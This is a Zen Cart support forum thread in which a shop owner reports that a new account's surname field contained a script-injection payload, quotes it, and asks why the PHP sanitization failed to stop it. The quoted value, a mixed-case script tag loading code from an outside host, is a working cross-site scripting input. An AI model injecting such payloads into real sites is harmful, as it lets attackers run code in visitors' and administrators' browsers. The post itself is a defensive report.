Thread: Hack attempt?

Results 1 to 5 of 5

Thread Tools
- Show Printable Version
- Subscribe to this Thread…
Search Thread
- Advanced Search
Display
- Switch to Linear Mode
- Switch to Hybrid Mode
- Threaded Mode

Threaded View

30 Nov 2021, 02:03 PM #1
strelitzia

View Profile

View Forum Posts

View Blog Entries

View Articles

Totally Zenned
Join Date

Nov 2005

Location

France

Posts

582

Plugin Contributions
8
Hack attempt?
I have a site running Zen Cart 1.5.7c with lat9's excellent One Page Checkout module.
A recent account created showed the following surname entry.

Code:

Anderson<ScRipT SRc=//nojs.me></

I checked the form fields and they are written like

Code:

$firstname = zen_db_prepare_input(zen_sanitize_string($_POST['firstname'])); $lastname = zen_db_prepare_input(zen_sanitize_string($_POST['lastname']));

How did this get passed zen carts' data sanitization?
Reply With Quote

« Previous Thread | Next Thread »

Similar Threads

Hack attempt

By Tapis in forum General Questions

Replies: 1
Last Post: 8 Sep 2011, 07:03 AM

Bookmarks

Bookmarks

Posting Permissions

You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
[VIDEO] code is On
HTML code is Off

Join our FREE Email Mailing List

@	MEMBER OF PROJECT HONEY POT Spam Harvester Protection Network provided by Unspam

Content and Graphics Copyright (c) 2003 - 2024 Zen Ventures, LLC - all rights reserved
Zen Cart® is a Registered Trademark of Zen Ventures, LLC